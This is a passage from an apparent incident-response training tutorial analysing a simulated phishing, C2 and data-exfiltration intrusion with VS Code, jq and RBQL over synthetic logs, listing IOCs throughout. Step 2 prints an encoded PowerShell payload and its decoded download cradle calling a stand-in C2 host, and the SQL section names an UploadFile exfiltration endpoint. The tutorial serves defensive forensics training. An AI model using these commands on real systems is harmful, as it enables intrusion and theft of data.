window.<br>Impact: Cannot confirm or rule out attacker activity during this period.<br>  All claims covering Oct 22–Nov 1 on this host are INFERRED or<br>  HYPOTHESIZED unless corroborated by VPN logs, DC auth logs, or<br>  firewall flows.<br>Possible cause: Deliberate - terminating Sysmon is T1562.001 (Impair<br>  Defenses). A gap coinciding with a malicious delivery is itself a<br>  finding, not merely an absence.</pre><h4>4. Commit the evidence inventory</h4><pre>git add 01-evidence/ 02-sources/source-registry.md<br>git commit -m "PROJ-2024-001: evidence inventory — 6 sources, GAP-001 (10-day Sysmon gap WS-IT-LEVI Oct 22–Nov 1), firewall log retrieval urgent before Nov 20"</pre><h3>Step R1.5: Hands-On Evidence Analysis — VS Code Investigation</h3><p>The evidence inventory tells you what exists. This step analyzes it. VS Code is the primary tool: one window holds the evidence tree, the formatted logs, the API calls, and the terminal — no context-switching between applications.</p><h4>Setup — Open the Evidence Folder</h4><pre># One command opens the entire evidence directory as a workspace<br>code ~/investigations/lifetech-2024-11/01-evidence/</pre><p>VS Code opens with the Explorer panel showing the full evidence tree. Every JSON, JSONL, CSV, and syslog file is one click away.</p><p><strong>Install four extensions before starting</strong> (Ctrl+Shift+X, search by ID):</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*LyER2G4y2xTAF1kXY4MX6A.png"></figure><p>Or install all at once from the integrated terminal (Ctrl+`` ):</p><pre>code --install-extension mechatroner.rainbow-csv<br>code --install-extension humao.rest-client<br>code --install-extension ms-vscode.hexeditor<br>code --install-extension esbenp.prettier-vscode</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/991/1*Pp_6YW13coi4GWZcb2a8Wg.png"></figure><p><strong>Key VS Code shortcuts used throughout this step:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2i3dAl46V_xX0cqntP0rCw.png"></figure><p><strong>Download the training evidence:</strong></p><pre>git clone https://github.com/anpa1200/CTI_as_a_Code.git<br>code ~/CTI_as_a_Code/investigations/lifetech-2024-11/01-evidence/</pre><p>Direct links to open any file in GitHub (also downloadable via curl -L):</p><ul><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/m365/message-trace-p.levi.csv">m365/message-trace-p.levi.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> IT admin phishing delivery, Oct 15–24</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/m365/message-trace-m.cohen.csv">m365/message-trace-m.cohen.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> CFO phishing delivery, Nov 13–15</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/azure-ad/signin-p.levi.json">azure-ad/signin-p.levi.json</a><br><strong>Format:</strong> JSON<br><strong>Contains:</strong> IT admin Azure AD sign-ins — Istanbul token replay</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/vpn/anyconnect-2024-10-24.log">vpn/anyconnect-2024-10-24.log</a><br><strong>Format:</strong> ASA syslog<br><strong>Contains:</strong> VPN session from Istanbul, Oct 24</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/sysmon/WS-CFO-01-sysmon.jsonl">sysmon/WS-CFO-01-sysmon.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> CFO workstation — PowerShell, LSASS, persistence, BITS</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/crowdstrike/WS-CFO-01-alert-20241115.json">crowdstrike/WS-CFO-01-alert-20241115.json</a><br><strong>Format:</strong> JSON<br><strong>Contains:</strong> CrowdStrike Falcon alert — triggering detection</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/windows-security/DC01-security.jsonl">windows-security/DC01-security.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> DC01 security events — DCSync EID 4662</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/windows-security/SERVER-RD-02-security.jsonl">windows-security/SERVER-RD-02-security.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> R&amp;D server — EID 4663 file access, EID 5156 exfil</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/palo-alto/ngfw-flows.csv">palo-alto/ngfw-flows.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> Perimeter firewall flows — 381 MB exfil confirmed</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/palo-alto/dns-queries.csv">palo-alto/dns-queries.csv</a><br><strong>Format:</strong> CSV<br><strong>Contains:</strong> DNS telemetry — C2 beacon pattern</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/sql-audit/SERVER-RD-02-sql-audit.jsonl">sql-audit/SERVER-RD-02-sql-audit.jsonl</a><br><strong>Format:</strong> JSONL<br><strong>Contains:</strong> SQL Server audit — full xp_cmdshell exfil chain</li><li><a href="https://raw.githubusercontent.com/anpa1200/CTI_as_a_Code/main/investigations/lifetech-2024-11/01-evidence/GAP-001-ws-it-levi-sysmon.md">GAP-001-ws-it-levi-sysmon.md</a><br><strong>Format:</strong> Markdown<br><strong>Contains:</strong> Documented 10-day Sysmon gap on IT admin host</li></ul><h4>1. CrowdStrike Alert — JSON in VS Code</h4><p><strong>In VS Code Explorer:</strong> click crowdstrike/WS-CFO-01-alert-20241115.json</p><p>Press Shift+Alt+F to auto-format. The nested structure becomes readable with collapsible sections.</p><p><strong>Open the Outline panel</strong> (Ctrl+Shift+O):</p><pre>▶ meta<br>▼ resources<br>  ▼ [0]<br>    ▶ device        — hostname, OS, groups<br>    ▼ behaviors<br>      [0] Execution / T1059.001  — OUTLOOK.EXE → powershell.exe<br>      [1] Command and Control / T1071.001<br>      [2] Persistence / T1547.001<br>      [3] Credential Access / T1003.001<br>    ▶ network_accesses<br>    ▶ prevention_policy</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EHUHyPz18JBNmPFRWS5VHA.png"></figure><p>Click any node to jump directly to that section. Click prevention_policy — you see "prevent": false immediately. The CFO's machine is in detect-only mode; the C2 connection is live. <strong>Take the memory dump before anything else.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bsA6unjBprE5asg-jKFbug.png"></figure><p><strong>Search</strong> (Ctrl+F): type prevented → jumps to "prevent": false. Type cmdline → jumps to the encoded PowerShell command.</p><p><strong>Or use jq tool:</strong></p><p><strong>Extract key fields in the integrated terminal</strong> (Ctrl+`` ):</p><pre>jq '.resources[0] | {<br>  detection_id,<br>  severity:  .max_severity_displayname,<br>  host:      .device.hostname,<br>  prevented: .prevention_policy.prevent,<br>  timestamp: .created_timestamp<br>}' crowdstrike/WS-CFO-01-alert-20241115.json</pre><p>Output:</p><pre>{<br>  "detection_id": "ldt:8f2a4b91e33a471cae44b2fdb8812201:884921003",<br>  "severity":     "Critical",<br>  "host":         "WS-CFO-01",<br>  "prevented":    false,<br>  "timestamp":    "2024-11-15T16:42:47.882Z"<br>}</pre><pre># List all detected behaviors<br>jq '.resources[0].behaviors[] | {<br>  timestamp, tactic, technique_id, display_name,<br>  parent: .parent_image_filename,<br>  image:  .filename,<br>  cmdline: (.cmdline // "" | .[0:80])<br>}' crowdstrike/WS-CFO-01-alert-20241115.json</pre><pre># Network connections observed<br>jq '.resources[0].network_accesses[] | {<br>  remote_address, remote_port, direction, timestamp<br>}' crowdstrike/WS-CFO-01-alert-20241115.json</pre><pre># Prevention policy — confirm detect-only mode and note the policy gap<br>jq '.resources[0].prevention_policy | {name, prevent, detect, note}' \<br>  crowdstrike/WS-CFO-01-alert-20241115.json</pre><p><strong>Found IOCs</strong></p><ul><li><strong>Host</strong> WS-CFO-01 — Victim workstation; CrowdStrike detect-only, C2 active</li><li><strong>Hash (SHA256)</strong> de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1848474f57 — powershell.exe behavior hash from alert</li><li><strong>Hash (MD5)</strong> 7353f60b1739074eb17c5f4dddefe239 — Same behavior; use both for VT lookup</li><li><strong>Process</strong> OUTLOOK.EXE → powershell.exe — Parent–child execution chain in behaviors[0]</li><li><strong>Cmdline</strong> -NonI -W Hidden -Enc JABjAD0A… — Encoded PowerShell payload; decode in Step 2</li><li><strong>IP</strong> 203.0.113.87 — C2 server; 3 connections in network_accesses, port 443</li></ul><h4>2. Decode the PowerShell Payload</h4><p>In the formatted JSON still open in VS Code, press Ctrl+F and search -Enc — the base64 argument is on the same line. Copy it.</p><p><strong>Decode in the integrated terminal</strong> — do not paste encoded malware into online decoders:</p><pre># PowerShell -Enc uses UTF-16LE encoding<br>echo "JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABkAD0AJABjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMgAwADMALgAwAC4AMQAxADMALgA4ADcALwB1AHAAZABhAHQAZQAnACkA" \<br>  | base64 -d</pre><p>Output:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*gtvadCAbVwcFaB8UcvEPCQ.png"></figure><pre>$c=New-Object System.Net.WebClient;$c.Headers.Add('User-Agent','Mozilla/5.0');$d=$c.DownloadString('https://203.0.113.87/update')</pre><p><strong>In VS Code Explorer:</strong> click sysmon/WS-CFO-01-sysmon.jsonl. Press Ctrl+F, search "EventID": 11 — jumps to the file creation event showing svchost32.exe dropped to AppData\Roaming. The analyst_note field confirms the fake PE timestamp.</p><pre># Cross-check: confirm what the PowerShell dropped<br>jq 'select(.EventID == 11) | {<br>  time: .TimeCreated, dropped_by: .Image, file: .TargetFilename, note: .analyst_note<br>}' sysmon/WS-CFO-01-sysmon.jsonl</pre><p><strong>Or use Base64 extention:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NX8NZYV10DhI03Lgy9E07A.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hRToibL_ojf36voYhSco2A.png"></figure><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 203.0.113.87 — Primary C2 server; payload download source</li><li><strong>URL</strong> https://203.0.113.87/update — C2 payload URL decoded from base64 PowerShell</li><li><strong>File</strong> svchost32.exe — Dropper deposited to %AppData%\Roaming\; forged PE timestamp</li></ul><h4>3. M365 Message Trace — Rainbow CSV</h4><p><strong>In VS Code Explorer:</strong> click m365/message-trace-p.levi.csv</p><p>With Rainbow CSV installed, every column gets its own color. The status bar at the bottom shows the column name as you move the cursor.</p><p><strong>RBQL — SQL queries against the CSV, no Python needed:</strong></p><p>Press F5 (or click RBQL in the status bar) to open the query console:</p><pre>-- Find all emails where authentication failed<br>SELECT a.* WHERE a16 == "fail" ORDER By a1</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IF23O_x92zR5XPNGe7gP2A.png"></figure><p>Result pane (right side):</p><pre>2024-10-22T11:23:07Z | security-noreply@mfa-lifetechpharma.com<br>  | ACTION REQUIRED: MFA Re-enrollment — LifeTech IT Security<br>  | Delivered | 4 | fail | fail | fail</pre><p>Three auth failures in one row. SCL=4 delivered because the threshold is 5. Add mfa-lifetechpharma.com to IOC list.</p><pre>SELECT a.* WHERE a17 == '1' &amp;&amp; a16 == 'fail'</pre><p><strong>Save RBQL results:</strong> click <strong>Save to CSV</strong> in the result panel → save as 03-analysis/m365-suspects.csv.</p><p><strong>Switch to </strong><strong>m365/message-trace-m.cohen.csv</strong> (click in Explorer):</p><pre>-- CFO mailbox — find the malicious delivery<br>SELECT a.received_time, a.sender_address, a.subject, a.SCL, a.DMARC, a.has_attachment<br>FROM a<br>WHERE a.DMARC == 'fail' OR a.has_attachment == '1'<br>ORDER BY a.received_time</pre><p>Key finding — CFO phishing email:</p><pre>2024-11-15T15:58:08Z | contracts@globalcontracts-secure.net<br>  | Q4-2024 Licensing Agreement Review — Action Required (URGENT)<br>  | SCL=4 | DMARC=fail | has_attachment=1</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p6mJFnpdRJE2EvoF-IxUFw.png"></figure><p>The .xlsm attachment was not sandboxed — ATP policy gap (INT-007). Add globalcontracts-secure.net to IOC list.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Domain</strong> mfa-lifetechpharma.com — AiTM phishing sender domain; DMARC/DKIM/SPF all fail</li><li><strong>Email</strong> security-noreply@mfa-lifetechpharma.com — IT admin phishing sender (Oct 22)</li><li><strong>Domain</strong> globalcontracts-secure.net — CFO phishing delivery domain</li><li><strong>Email</strong> contracts@globalcontracts-secure.net — CFO phishing sender (Nov 15)</li><li><strong>Attachment</strong> .xlsm — Macro-enabled Excel; bypassed ATP sandbox (INT-007)</li></ul><h4>4. Azure AD Sign-In Analysis</h4><p><strong>In VS Code Explorer:</strong> click azure-ad/signin-p.levi.json</p><p>Press Shift+Alt+F to format. Open the Outline (Ctrl+Shift+O) — the array shows four sign-in entries. Click entry [1] to jump to aad-signin-002.</p><p><strong>Search</strong> Ctrl+F: type Istanbul — jumps directly to the suspicious sign-in. Read surrounding context without running any command:</p><pre>"city": "Istanbul",<br>"countryOrRegion": "TR",<br>"conditionalAccessStatus": "notApplied",<br>"succeeded": null</pre><p>Three red flags visible immediately in the file: foreign city, CA bypassed, no MFA.</p><p><strong>Full structured extraction in the terminal:</strong></p><pre>jq '.[] | {<br>  id,<br>  time: .properties.createdDateTime,<br>  ip:   .properties.ipAddress,<br>  loc:  "\(.properties.location.city), \(.properties.location.countryOrRegion)",<br>  mfa:  .properties.authenticationDetails[0].succeeded,<br>  ca:   .properties.conditionalAccessStatus,<br>  os:   .properties.deviceDetail.operatingSystem<br>}' azure-ad/signin-p.levi.json</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XkLVEejy4bkZ71px3sihoQ.png"></figure><p><strong>Red flags on </strong><strong>aad-signin-002:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Isdphk9PrvplMM2sWbc8Vg.png"></figure><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 185.220.101.47 — Attacker source IP; Istanbul, Turkey (Tor exit node)</li><li><strong>Account</strong> p.levi — Compromised IT admin; token replay, no MFA challenge</li><li><strong>Indicator</strong> Token replay — CA policy bypassed; conditionalAccessStatus: notApplied</li></ul><h4>5. VPN Log Analysis</h4><p><strong>In VS Code Explorer:</strong> click vpn/anyconnect-2024-10-24.log</p><p>VS Code opens the plain syslog file. Use Ctrl+F to navigate without any commands:</p><ul><li>Search p.levi — highlights every line for this user</li><li>Search Authentication: successful — the auth event</li><li>Search Assigned address — the internal IP assigned to the session</li><li>Search Duration — total session length</li></ul><pre># Full session chain in the terminal:<br>grep "p.levi" vpn/anyconnect-2024-10-24.log \<br>  | grep -E "(716001|716002|734001|Authentication|Teardown|Assigned)"</pre><p>Output:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BsNecLZvZT8bDwFYWsb-nQ.png"></figure><pre>Oct 24 00:17:14 ... User &lt;p.levi&gt; IP &lt;185.220.101.47&gt; Authentication: successful<br>Oct 24 00:17:33 ... User &lt;p.levi&gt; ... Assigned address: 10.10.3.22<br>Oct 24 02:29:08 ... User &lt;p.levi&gt; ... Duration: 1h12m34s</pre><p>185.220.101.47 (Istanbul VPN exit) authenticated as p.levi and was assigned 10.10.3.22 — WS-IT-LEVI's own internal IP. All activity during this session looks like it came from the legitimate workstation.</p><pre>grep -i "mfa\|no.*challenge\|bypass" vpn/anyconnect-2024-10-24.log<br># → NOTE: No MFA challenge issued — session token authentication bypass<br>grep "203.0.113.87" vpn/anyconnect-2024-10-24.log | awk '{print $1,$2,$3}' | head -8<br># → ~7-minute C2 beacons during the VPN session window</pre><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 185.220.101.47 — Attacker VPN source; Istanbul; authenticated as p.levi</li><li><strong>Account</strong> p.levi — Session token auth; no MFA challenge issued</li><li><strong>IP (internal)</strong> 10.10.3.22 — Assigned to attacker session; masks as WS-IT-LEVI</li><li><strong>IP</strong> 203.0.113.87 — C2 beacons during VPN session (~7-min interval)</li></ul><h4>6. NGFW Log Analysis — Rainbow CSV</h4><p><strong>In VS Code Explorer:</strong> click palo-alto/ngfw-flows.csv</p><p>Rainbow CSV colorizes columns. The status bar shows column names as you move the cursor.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Yz7EggRReYdjyRyz79n79A.png"></figure><p>RBQLHeader<br>a1receive_time<br>a22dport<br>a5src<br>a28bytes<br>a6dst<br>a29bytes_sent<br>a9rule<br>a30bytes_received<br>a10srcuser<br>a33elapsed<br>a12app<br>a34category<br>a27action<br>a41session_end_reason</p><p><strong>In VS Code Explorer:</strong> click palo-alto/ngfw-flows.csv. Press F5 to open the RBQL console.</p><p><strong>Query 1 — find anomalies: all flows sorted by bytes_sent descending</strong></p><p>Start here every time. The outlier appears immediately.</p><pre>SELECT a1, a5, a6, a22,<br>       Math.round(parseInt(a29) / 1048576) + ' MB' AS sent_MB,<br>       Math.round(parseInt(a30) / 1024) + ' KB' AS rcvd_KB,<br>       a33 + 's', a10<br>ORDER BY parseInt(a29) DESC</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pszv_-CeRnD-lNlUmL8VBQ.png"></figure><pre>2024-11-06T00:14:14Z | 10.10.2.15 | 198.51.100.44 | 443 | 381 MB | 409 KB | 312s |<br>2024-11-15T16:42:41Z | 10.10.1.45 | 203.0.113.87  | 443 |  17 MB |  10 KB |  63s | LIFETECHPHARMA\m.cohen<br>2024-11-15T16:49:22Z | 10.10.1.45 | 203.0.113.87  | 443 |  14 MB |  10 KB |  61s | LIFETECHPHARMA\m.cohen<br>2024-11-15T16:56:03Z | 10.10.1.45 | 203.0.113.87  | 443 |  14 MB |  10 KB |  59s | LIFETECHPHARMA\m.cohen<br>2024-11-06T00:09:44Z | 10.10.3.22 | 203.0.113.87  | 443 |   9 KB |   7 KB |  51s | LIFETECHPHARMA\p.levi<br>...</pre><p>The first row is 17,000× larger than any other flow. Upload ratio 99% (381 MB sent, 409 KB received). Session lasted 312 seconds. This is data exfiltration, not a download.</p><p>Two hosts are beaconing to the same C2 IP: 10.10.3.22 (IT admin, p.levi) and 10.10.1.45 (CFO, m.cohen) — two separate infections.</p><p><strong>Query 2 — exfil upload ratio: flag flows where sent &gt; 90% of total bytes</strong></p><pre>SELECT a1, a5, a6, a22,<br>       Math.round(parseInt(a29) / 1048576) + ' MB' AS sent_MB,<br>       Math.round(parseInt(a29) * 100 / (parseInt(a28) + 1)) + '%' AS upload_pct,<br>       a33 + 's'<br>WHERE parseInt(a28) &gt; 100000<br>ORDER BY parseInt(a29) DESC</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UkpGfIAnhSx0k-VE5CATzg.png"></figure><p>Result: only one row — 10.10.2.15 → 198.51.100.44, 99% upload, 381 MB. Every other flow is bidirectional C2 (55–65% upload) which is beacon traffic, not exfil.</p><p><strong>Query 3 — beacon pattern: repeated small flows to same external IP</strong></p><pre>SELECT a6, COUNT(a6) AS sessions,<br>       AVG(parseInt(a28)) AS avg_bytes,<br>       AVG(parseInt(a33)) AS avg_elapsed_s<br>WHERE a6 &amp;&amp; !a6.startsWith('10.') &amp;&amp; !a6.startsWith('192.168.')<br>   &amp;&amp; !isNaN(parseInt(a28))<br>GROUP BY a6Result:</pre><pre>203.0.113.87   | 9 sessions | ~14 KB avg | ~47s avg<br>198.51.100.44  | 1 session  | 399 MB avg | 312s avg</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*264pKTvyyeuGVoAIwQVvSw.png"></figure><p>203.0.113.87 has 9 short uniform sessions — beacon. 198.51.100.44 has one giant session — exfil.</p><p><strong>Query 4 — internal lateral movement: flows that stay inside RFC-1918</strong></p><pre>SELECT a1, a5, a6, a22, a28, a9, a10<br>WHERE a5 &amp;&amp; a6<br>   &amp;&amp; (a5.startsWith('10.') || a5.startsWith('192.168.'))<br>   &amp;&amp; (a6.startsWith('10.') || a6.startsWith('192.168.'))<br>ORDER BY a1</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*epr64_sA5gqNzWxgEi-LpQ.png"></figure><pre>2024-11-15T19:14:08Z | 10.10.1.45 | 10.10.2.20 | 135   | 8441  | InternalAccess-Allow<br>2024-11-15T19:14:18Z | 10.10.1.45 | 10.10.2.20 | 49152 | 12884 | InternalAccess-Allow</pre><p>CFO workstation (10.10.1.45) connected to an internal host (10.10.2.20) on port 135 (DCE/RPC endpoint mapper) then port 49152 (dynamic RPC). This is the WMI/DCOM lateral movement signature — 3 hours after the CFO was compromised.</p><p><strong>Query 5 — beacon timing: isolate C2 host and sort by time to measure intervals</strong></p><pre>SELECT a1, a5, a6, parseInt(a29) AS bytes_sent, a33 + 's'<br>WHERE a6 == '203.0.113.87'<br>ORDER BY a1</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*f8M-EcFKrYAOXIzIOfoNlw.png"></figure><pre>2024-11-01T07:14:02Z | 10.10.3.22 | 8441 bytes | 47s   ← WS-IT-LEVI session 1<br>2024-11-01T07:21:14Z | 10.10.3.22 | 8221 bytes | 45s   ← gap: 432s<br>2024-11-01T07:28:44Z | 10.10.3.22 | 7882 bytes | 44s   ← gap: 450s<br>                     ↓ 4.7-day silence (C2 dormant) ↓<br>2024-11-06T00:09:44Z | 10.10.3.22 | 9441 bytes | 51s   ← WS-IT-LEVI session 2<br>2024-11-06T00:17:01Z | 10.10.3.22 | 8001 bytes | 46s   ← gap: 437s<br>2024-11-06T00:24:33Z | 10.10.3.22 | 8011 bytes | 44s   ← gap: 452s<br>2024-11-15T16:42:41Z | 10.10.1.45 | 18221 bytes| 63s   ← WS-CFO-01 session 1<br>2024-11-15T16:49:22Z | 10.10.1.45 | 14441 bytes| 61s   ← gap: 401s<br>2024-11-15T16:56:03Z | 10.10.1.45 | 15001 bytes| 59s   ← gap: 421s</pre><p>Beacon interval: <strong>432–452 seconds (~7.2 minutes)</strong>. Consistent across both infected hosts — same implant, same configuration. The 4.7-day gap (Nov 1–6) between IT admin beacon clusters is the C2 going quiet while staging lateral movement.</p><p><strong>Click </strong><strong>palo-alto/dns-queries.csv</strong> in Explorer.</p><p><strong>Column map:</strong></p><p>RBQLHeader<br>a1receive_time<br>a2src<br>a4query<br>a6response<br>a8category<br>a10analyst_note</p><p><strong>Query 6 — all malware-category queries, sorted by time</strong></p><pre>SELECT a1, a2, a4, a6, a8<br>FROM a<br>WHERE a8 == 'malware'<br>ORDER BY a1</pre><p>Result — full malware DNS timeline:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RErM3MswME78yNNi0pB92A.png"></figure><pre>2024-10-22T09:28:41Z | 10.10.3.22 | mfa-lifetechpharma.com       | 185.220.101.47  | malware ← AiTM phishing page loaded<br>2024-10-22T09:29:02Z | 10.10.3.22 | mfa-lifetechpharma.com       | 185.220.101.47  | malware ← token stolen<br>2024-11-01T07:14:00Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware ← C2 beacon 1<br>2024-11-01T07:21:14Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-01T07:28:44Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-06T00:09:01Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-06T00:17:01Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware ← (missing from log)<br>2024-11-06T00:24:33Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-06T00:10:14Z | 10.10.2.15 | sys-update-cdn.net            | 198.51.100.44   | malware ← exfil domain lookup<br>2024-11-15T15:58:08Z | 10.10.1.45 | globalcontracts-secure.net    | 185.220.101.52  | malware ← CFO phishing domain<br>2024-11-15T16:42:33Z | 10.10.1.45 | telemetry-cdn-services.biz   | 203.0.113.87    | malware ← CFO C2 beacon 1<br>2024-11-15T16:49:22Z | 10.10.1.45 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-15T16:56:03Z | 10.10.1.45 | telemetry-cdn-services.biz   | 203.0.113.87    | malware</pre><p><strong>Query 7 — per-host beacon count: how many hosts are infected?</strong></p><pre>SELECT a2, COUNT(a2) AS queries<br>WHERE a4 == 'telemetry-cdn-services.biz'<br>GROUP BY a2</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*v94DK5JOd0MBwJUOjqBpAg.png"></figure><pre>10.10.3.22 | 6   ← WS-IT-LEVI (IT admin) — infected Nov 1<br>10.10.1.45 | 3   ← WS-CFO-01 (CFO) — infected Nov 15</pre><p>Two hosts. Two infections. Same C2 domain. The IT admin host was the initial foothold; the CFO host is the second wave, 14 days later.</p><p><strong>Query 8 — new IP: attacker recon before VPN login</strong></p><pre>SELECT a1, a2, a4, a6, a8, a10<br>WHERE a2 &amp;&amp; !a2.startsWith('10.') &amp;&amp; !a2.startsWith('192.168.')<br>ORDER BY a1</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lj9D7dZos_et_O16rjcfOg.png"></figure><pre>2024-10-24T00:16:44Z | 185.220.101.47 | vpn.lifetechpharma.com | 10.10.8.1 | business-and-economy</pre><p>The attacker IP (185.220.101.47) looked up the VPN hostname 1 minute before the successful VPN login. Confirms active operator, not automated tool.</p><p><strong>Cross-reference with flows</strong> (Ctrl+Shift+F → 198.51.100.44):</p><pre>ngfw-flows.csv   line 11: 10.10.2.15 → 198.51.100.44 | 399 MB | 312s<br>dns-queries.csv  line 14: 10.10.2.15 → sys-update-cdn.net → 198.51.100.44</pre><p>DNS lookup at 00:10:14Z, flow starts at 00:14:14Z — 4-minute gap between resolution and transfer start. Consistent with manual operator staging the upload command.</p><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 198.51.100.44 — Exfil destination; 381 MB upload, 99% upload ratio, 312s, single session</li><li><strong>IP (internal)</strong> 10.10.2.15 — SERVER-RD-02; exfil source host</li><li><strong>IP</strong> 203.0.113.87 — C2 server; 9 beacon sessions from 2 hosts, ~7.2-min interval</li><li><strong>IP</strong> 185.220.101.52 — New; CFO phishing page host (globalcontracts-secure.net)</li><li><strong>IP (internal)</strong> 10.10.2.20 — Lateral movement target; reached from CFO host on ports 135 + 49152 (RPC/WMI)</li><li><strong>Domain</strong> telemetry-cdn-services.biz — C2 domain; queried by both 10.10.3.22 and 10.10.1.45</li><li><strong>Domain</strong> sys-update-cdn.net — Exfil domain; resolves to 198.51.100.44; queried by 10.10.2.15</li><li><strong>Domain</strong> mfa-lifetechpharma.com — AiTM phishing domain; resolves to 185.220.101.47</li><li><strong>Indicator</strong> Beacon interval 432–452s (~7.2 min) — identical across both infected hosts; same implant config</li><li><strong>Indicator</strong> Attacker recon: 185.220.101.47 queried vpn.lifetechpharma.com 1 min before VPN login7. SQL Audit Log Analysis</li></ul><h4><strong>7. SQL Audit Log Analysis</strong></h4><p><strong>In VS Code Explorer:</strong> click sql-audit/SERVER-RD-02-sql-audit.jsonl</p><p>Each line is a JSON object. Use Ctrl+F to navigate directly to key events:</p><p>Search termJumps to</p><p>xp_cmdshellShell execution events<br>AuditLogAdversary OPSEC recon <br>(SELECT) and anti-forensics (DELETE)<br>UploadFileThe exfiltration command<br>Compress-ArchiveThe staging command</p><p><strong>Full chain in the terminal:</strong></p><pre>jq -r '[.EventTime, .LoginName, .StatementType, (.Statement[0:90])] | @tsv' \<br>  sql-audit/SERVER-RD-02-sql-audit.jsonl</pre><p>Six events: enumerate → recon (SELECT AuditLog) → stage → exfil → cleanup → anti-forensics (DELETE AuditLog). The DELETE at 00:15:22Z failed because Splunk had already ingested these rows before it ran.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Account</strong> svc_backup — Lateral movement account; executed full xp_cmdshell chain</li><li><strong>URL</strong> 198.51.100.44/recv — Exfil endpoint used by WebClient.UploadFile</li><li><strong>File</strong> USPartner2024-formulas.zip — Staged archive; formula data compressed before exfil</li><li><strong>Indicator</strong> xp_cmdshell (T1059.003) — SQL Server shell used as execution proxy</li><li><strong>Indicator</strong> Anti-forensics — DELETE on SQL AuditLog at 00:15:22Z; blocked by prior Splunk ingestion</li></ul><h4>8. Windows Security Event Log Analysis</h4><p><strong>In VS Code Explorer:</strong> click windows-security/DC01-security.jsonl</p><p>Press Ctrl+F, search 4662 — jumps to the DCSync event. The analyst_note gives the human-readable summary in the file itself:</p><pre>🔴 CRITICAL: DCSync — DS-Replication-Get-Changes + DS-Replication-Get-Changes-All<br>from WORKSTATION IP 10.10.3.22 (WS-IT-LEVI). NOT a DC. NOT in pentest VLAN (10.10.99.x).</pre><pre># All three DCSync events — domain, krbtgt, Administrator<br>jq 'select(.EventID == 4662) | {<br>  time: .TimeCreated, 